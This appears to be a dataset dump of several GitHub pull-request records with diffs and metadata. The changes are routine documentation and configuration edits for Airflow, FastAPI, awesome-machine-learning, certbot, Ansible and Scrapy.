+``task2``. It will be first skipped directly by ``LatestOnlyOperator``,
+even its ``trigger_rule`` is set to ``all_done``.
.. image:: img/latest_only_with_trigger.png
diff --git a/docs/img/branch_with_trigger.png b/docs/img/branch_with_trigger.png
new file mode 100644
index 0000000000000..0aab8a1b3a5c8
Binary files /dev/null and b/docs/img/branch_with_trigger.png differ
diff --git a/docs/img/branch_without_trigger.png b/docs/img/branch_without_trigger.png
new file mode 100644
index 0000000000000..748c796a4981f
Binary files /dev/null and b/docs/img/branch_without_trigger.png differ
diff --git a/docs/img/latest_only_with_trigger.png b/docs/img/latest_only_with_trigger.png
index 629adfa907964..623f8ee177ff0 100644
Binary files a/docs/img/latest_only_with_trigger.png and b/docs/img/latest_only_with_trigger.png differ
|
### Jira
- [x] My PR addresses the following [Airflow Jira](https://issues.apache.org/jira/browse/AIRFLOW/) issues and references them in the PR title.
- https://issues.apache.org/jira/browse/AIRFLOW-3977
- https://issues.apache.org/jira/browse/AIRFLOW-1784
### Description
- [x] Here are some details about my PR, including screenshots of any UI changes:
The current LatestOnlyOperator will skip all downstream tasks blindly. However, the doc shows it will respect trigger rules which is a wrong behavior.
It also shows an incorrect example of the interaction between skipped tasks and trigger rules in schedule level. I replace it with other examplesusing BranchingOperator.
### Tests
- [x] My PR adds the following unit tests __OR__ does not need testing for this extremely good reason:
No test needed because its changes on documentation.
### Commits
- [x] My commits all reference Jira issues in their subject lines, and I have squashed multiple commits if they address the same issue. In addition, my commits follow the guidelines from "[How to write a good git commit message](http://chris.beams.io/posts/git-commit/)":
1. Subject is separated from body by a blank line
1. Subject is limited to 50 characters (not including Jira issue reference)
1. Subject does not end with a period
1. Subject uses the imperative mood ("add", not "adding")
1. Body wraps at 72 characters
1. Body explains "what" and "why", not "how"
### Documentation
- [x] In case of new functionality, my PR adds documentation that describes how to use it.
- When adding new operators/hooks/sensors, the autoclass documentation generation needs to be added.
- All the public functions and the classes in the PR contain docstrings that explain what it does
### Code Quality
- [x] Passes `flake8`
|
https://api.github.com/repos/apache/airflow/pulls/4805
|
2019-03-01T03:15:32Z
|
2019-03-02T07:13:58Z
|
2019-03-02T07:13:58Z
|
2019-04-16T06:42:47Z
| 1,435
|
apache/airflow
| 14,404
|
📝 Add articles to External Links
|
diff --git a/docs/en/data/external_links.yml b/docs/en/data/external_links.yml
index 00e92801fe5d0..15a513a4da1b9 100644
--- a/docs/en/data/external_links.yml
+++ b/docs/en/data/external_links.yml
@@ -136,6 +136,14 @@ articles:
title: Build And Host Fast Data Science Applications Using FastAPI
author_link: https://medium.com/@farhadmalik
author: Farhad Malik
+ - link: https://medium.com/@gabbyprecious2000/creating-a-crud-app-with-fastapi-part-one-7c049292ad37
+ title: Creating a CRUD App with FastAPI (Part one)
+ author_link: https://medium.com/@gabbyprecious2000
+ author: Precious Ndubueze
+ - link: https://julienharbulot.com/notification-server.html
+ title: HTTP server to display desktop notifications
+ author_link: https://julienharbulot.com/
+ author: Julien Harbulot
japanese:
- link: https://qiita.com/mtitg/items/47770e9a562dd150631d
title: FastAPI|DB接続してCRUDするPython製APIサーバーを構築
|
📝 Add a couple of articles to External Links
|
https://api.github.com/repos/tiangolo/fastapi/pulls/2247
|
2020-10-25T18:19:24Z
|
2020-10-25T18:25:32Z
|
2020-10-25T18:25:32Z
|
2020-10-25T18:25:35Z
| 297
|
tiangolo/fastapi
| 23,560
|
The course 'Neural Networks for Machine Learning is no longer availab…
|
diff --git a/courses.md b/courses.md
index 57a92f6f..cd1725ba 100644
--- a/courses.md
+++ b/courses.md
@@ -5,7 +5,7 @@ The following is a list of free or paid online courses on machine learning, stat
* [Artificial Intelligence (Columbia University)](https://www.edx.org/course/artificial-intelligence-ai-columbiax-csmm-101x-0) - free
* [Machine Learning (Columbia University)](https://www.edx.org/course/machine-learning-columbiax-csmm-102x-0) - free
* [Machine Learning (Stanford University)](https://www.coursera.org/learn/machine-learning) - free
-* [Neural Networks for Machine Learning (University of Toronto)](https://www.coursera.org/learn/neural-networks) - free. Also [available on YouTube](https://www.youtube.com/watch?v=cbeTc-Urqak&list=PLYvFQm7QY5Fy28dST8-qqzJjXr83NKWAr) as a playlist.
+* [Neural Networks for Machine Learning (University of Toronto)](https://www.coursera.org/learn/neural-networks) - free. Also [available on YouTube](https://www.youtube.com/watch?v=cbeTc-Urqak&list=PLYvFQm7QY5Fy28dST8-qqzJjXr83NKWAr) as a playlist. #This course is no longer available on Coursera.
* [Deep Learning Specialization (by Andrew Ng, deeplearning.ai)](https://www.coursera.org/specializations/deep-learning) - Courses: I Neural Networks and Deep Learning; II Improving Deep Neural Networks: Hyperparameter tuning, Regularization and Optimization; III Structuring Machine Learning Projects; IV Convolutional Neural Networks; V Sequence Models; Paid for grading/certification, financial aid available, free to audit
* [Deep Learning Nano Degree on Udacity](https://www.udacity.com/course/deep-learning-nanodegree--nd101) - $
* [Intro to Deep Learning (MIT)](http://introtodeeplearning.com/)
|
The course 'Neural Networks for Machine Learning' is no longer available on Coursera.
|
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/634
|
2019-10-02T16:04:03Z
|
2019-10-07T22:42:53Z
|
2019-10-07T22:42:52Z
|
2019-10-07T22:42:53Z
| 496
|
josephmisiti/awesome-machine-learning
| 51,908
|
Do not document private members
|
diff --git a/acme/docs/conf.py b/acme/docs/conf.py
index 01029a81f7e..8c1689128c8 100644
--- a/acme/docs/conf.py
+++ b/acme/docs/conf.py
@@ -41,7 +41,7 @@
]
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-cloudflare/docs/conf.py b/certbot-dns-cloudflare/docs/conf.py
index 488268577da..97e54421ea5 100644
--- a/certbot-dns-cloudflare/docs/conf.py
+++ b/certbot-dns-cloudflare/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-cloudxns/docs/conf.py b/certbot-dns-cloudxns/docs/conf.py
index 16ccd1d62d9..1fc05c94cc5 100644
--- a/certbot-dns-cloudxns/docs/conf.py
+++ b/certbot-dns-cloudxns/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-digitalocean/docs/conf.py b/certbot-dns-digitalocean/docs/conf.py
index 9c493a22011..0741e4cea3a 100644
--- a/certbot-dns-digitalocean/docs/conf.py
+++ b/certbot-dns-digitalocean/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-dnsimple/docs/conf.py b/certbot-dns-dnsimple/docs/conf.py
index b5cb24e2fab..99cc931356e 100644
--- a/certbot-dns-dnsimple/docs/conf.py
+++ b/certbot-dns-dnsimple/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-dnsmadeeasy/docs/conf.py b/certbot-dns-dnsmadeeasy/docs/conf.py
index 60e0163bd50..1f0c57812ea 100644
--- a/certbot-dns-dnsmadeeasy/docs/conf.py
+++ b/certbot-dns-dnsmadeeasy/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-gehirn/docs/conf.py b/certbot-dns-gehirn/docs/conf.py
index 67aafa3b404..527bc3d55be 100644
--- a/certbot-dns-gehirn/docs/conf.py
+++ b/certbot-dns-gehirn/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-google/docs/conf.py b/certbot-dns-google/docs/conf.py
index 8f045cf3f1f..b2ddcfb3473 100644
--- a/certbot-dns-google/docs/conf.py
+++ b/certbot-dns-google/docs/conf.py
@@ -39,7 +39,7 @@
'jsonlexer']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-linode/docs/conf.py b/certbot-dns-linode/docs/conf.py
index f23d6502381..c6d564b7a34 100644
--- a/certbot-dns-linode/docs/conf.py
+++ b/certbot-dns-linode/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-luadns/docs/conf.py b/certbot-dns-luadns/docs/conf.py
index 899480f66e9..8e9d499887d 100644
--- a/certbot-dns-luadns/docs/conf.py
+++ b/certbot-dns-luadns/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-nsone/docs/conf.py b/certbot-dns-nsone/docs/conf.py
index aec0771a206..5531959eddf 100644
--- a/certbot-dns-nsone/docs/conf.py
+++ b/certbot-dns-nsone/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-ovh/docs/conf.py b/certbot-dns-ovh/docs/conf.py
index a4985edee8d..56e24a92006 100644
--- a/certbot-dns-ovh/docs/conf.py
+++ b/certbot-dns-ovh/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-rfc2136/docs/conf.py b/certbot-dns-rfc2136/docs/conf.py
index e4df8459440..c0d55078e78 100644
--- a/certbot-dns-rfc2136/docs/conf.py
+++ b/certbot-dns-rfc2136/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-route53/docs/conf.py b/certbot-dns-route53/docs/conf.py
index cb8aae0b6c8..c2eb880ac59 100644
--- a/certbot-dns-route53/docs/conf.py
+++ b/certbot-dns-route53/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot-dns-sakuracloud/docs/conf.py b/certbot-dns-sakuracloud/docs/conf.py
index f973779ab83..70a4d74347f 100644
--- a/certbot-dns-sakuracloud/docs/conf.py
+++ b/certbot-dns-sakuracloud/docs/conf.py
@@ -38,7 +38,7 @@
'sphinx.ext.viewcode']
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/certbot/docs/conf.py b/certbot/docs/conf.py
index 6b7c1c2c061..1e57bc2247c 100644
--- a/certbot/docs/conf.py
+++ b/certbot/docs/conf.py
@@ -52,7 +52,7 @@
extensions.append('sphinx.ext.imgconverter')
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/letshelp-certbot/docs/conf.py b/letshelp-certbot/docs/conf.py
index fcff25d556f..fc482a3488e 100644
--- a/letshelp-certbot/docs/conf.py
+++ b/letshelp-certbot/docs/conf.py
@@ -40,7 +40,7 @@
]
autodoc_member_order = 'bysource'
-autodoc_default_flags = ['show-inheritance', 'private-members']
+autodoc_default_flags = ['show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
diff --git a/tools/sphinx-quickstart.sh b/tools/sphinx-quickstart.sh
index 72dc9e200ef..35a7f7fad54 100755
--- a/tools/sphinx-quickstart.sh
+++ b/tools/sphinx-quickstart.sh
@@ -14,7 +14,7 @@ sed -i -e "s|\# import os|import os|" conf.py
sed -i -e "s|\# needs_sphinx = '1.0'|needs_sphinx = '1.0'|" conf.py
sed -i -e "s|intersphinx_mapping = {'https://docs.python.org/': None}|intersphinx_mapping = {\n 'python': ('https://docs.python.org/', None),\n 'acme': ('https://acme-python.readthedocs.org/en/latest/', None),\n 'certbot': ('https://certbot.eff.org/docs/', None),\n}|" conf.py
sed -i -e "s|html_theme = 'alabaster'|\n# http://docs.readthedocs.org/en/latest/theme.html#how-do-i-use-this-locally-and-on-read-the-docs\n# on_rtd is whether we are on readthedocs.org\non_rtd = os.environ.get('READTHEDOCS', None) == 'True'\nif not on_rtd: # only import and set the theme if we're building docs locally\n import sphinx_rtd_theme\n html_theme = 'sphinx_rtd_theme'\n html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n# otherwise, readthedocs.org uses their theme by default, so no need to specify it|" conf.py
-sed -i -e "s|# Add any paths that contain templates here, relative to this directory.|autodoc_member_order = 'bysource'\nautodoc_default_flags = ['show-inheritance', 'private-members']\n\n# Add any paths that contain templates here, relative to this directory.|" conf.py
+sed -i -e "s|# Add any paths that contain templates here, relative to this directory.|autodoc_member_order = 'bysource'\nautodoc_default_flags = ['show-inheritance']\n\n# Add any paths that contain templates here, relative to this directory.|" conf.py
sed -i -e "s|# The name of the Pygments (syntax highlighting) style to use.|default_role = 'py:obj'\n\n# The name of the Pygments (syntax highlighting) style to use.|" conf.py
echo "/_build/" >> .gitignore
echo "=================
|
It looks like we're currently documenting functions that are marked private (prefixed with an underscore) such as https://certbot.eff.org/docs/api/certbot.crypto_util.html#certbot.crypto_util._load_cert_or_req. I do not think we should do this because the functionality is private, should not be used, and including it in our docs just adds visual noise.
This PR stops us from documenting private code and fixes up `tools/sphinx-quickstart.sh` so we don't document it in future modules.
|
https://api.github.com/repos/certbot/certbot/pulls/7675
|
2020-01-10T19:13:31Z
|
2020-01-11T00:48:02Z
|
2020-01-11T00:48:02Z
|
2020-01-11T00:48:08Z
| 3,142
|
certbot/certbot
| 3,068
|
Add gdpak to networking team
|
diff --git a/.github/BOTMETA.yml b/.github/BOTMETA.yml
index e54bf33cbd5065..ceb29e32bd47b8 100644
--- a/.github/BOTMETA.yml
+++ b/.github/BOTMETA.yml
@@ -486,7 +486,7 @@ files:
$modules/network/illumos/: xen0l
$modules/network/interface/: $team_networking
$modules/network/ios/: privateip rcarrillocruz kedarX
- $modules/network/iosxr/: privateip rcarrillocruz kedarX
+ $modules/network/iosxr/: privateip rcarrillocruz kedarX gdpak
$modules/network/ironware/: paulquack
$modules/network/junos/: Qalthos ganeshrn
$modules/network/layer2/: $team_networking
@@ -1140,12 +1140,12 @@ macros:
team_netapp: hulquest lmprice broncofan gouthampacha
team_netscaler: chiradeep giorgos-nikolopoulos
team_netvisor: Qalthos amitsi gundalow privateip
- team_networking: Qalthos ganeshrn gundalow privateip rcarrillocruz trishnaguha kedarX
+ team_networking: Qalthos ganeshrn gundalow privateip rcarrillocruz trishnaguha kedarX gdpak
team_nso: cmoberg cnasten
team_nxos: mikewiebe privateip rahushen rcarrillocruz trishnaguha kedarX
team_onyx: samerd
team_openstack: emonty j2sol juliakreger rcarrillocruz shrews thingee dagnello
- team_openswitch: Qalthos gundalow privateip
+ team_openswitch: Qalthos gundalow privateip gdpak
team_rabbitmq: chrishoffman manuel-sousa hyperized
team_rhn: alikins barnabycourt flossware vritant
team_tower: ghjm jlaska matburt wwitzel3
|
for notifications on PR etc
|
https://api.github.com/repos/ansible/ansible/pulls/36822
|
2018-02-28T06:44:31Z
|
2018-02-28T06:51:00Z
|
2018-02-28T06:51:00Z
|
2019-04-27T00:17:47Z
| 502
|
ansible/ansible
| 48,858
|
Recommend Common Crawl instead of Google Cache
|
diff --git a/docs/topics/practices.rst b/docs/topics/practices.rst
index 1a9d5614390..d0207fd18c6 100644
--- a/docs/topics/practices.rst
+++ b/docs/topics/practices.rst
@@ -262,7 +262,7 @@ Here are some tips to keep in mind when dealing with these kinds of sites:
* disable cookies (see :setting:`COOKIES_ENABLED`) as some sites may use
cookies to spot bot behaviour
* use download delays (2 or higher). See :setting:`DOWNLOAD_DELAY` setting.
-* if possible, use `Google cache`_ to fetch pages, instead of hitting the sites
+* if possible, use `Common Crawl`_ to fetch pages, instead of hitting the sites
directly
* use a pool of rotating IPs. For example, the free `Tor project`_ or paid
services like `ProxyMesh`_. An open source alternative is `scrapoxy`_, a
@@ -277,7 +277,7 @@ If you are still unable to prevent your bot getting banned, consider contacting
.. _Tor project: https://www.torproject.org/
.. _commercial support: https://scrapy.org/support/
.. _ProxyMesh: https://proxymesh.com/
-.. _Google cache: http://www.googleguide.com/cached_pages.html
+.. _Common Crawl: https://commoncrawl.org/
.. _testspiders: https://github.com/scrapinghub/testspiders
.. _scrapoxy: https://scrapoxy.io/
.. _Zyte Smart Proxy Manager: https://www.zyte.com/smart-proxy-manager/
|
Closes #3582
The terms of use allow scraping as long as Scrapy honours the restrictions of robot.txt files and NOFOLLOW metatags
Common Crawl terms of use: https://commoncrawl.org/terms-of-use/
|
https://api.github.com/repos/scrapy/scrapy/pulls/5432
|
2022-03-01T21:10:37Z
|
2022-03-11T15:05:43Z
|
2022-03-11T15:05:43Z
|
2022-03-11T15:05:43Z
| 359
|
scrapy/scrapy
| 34,899
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.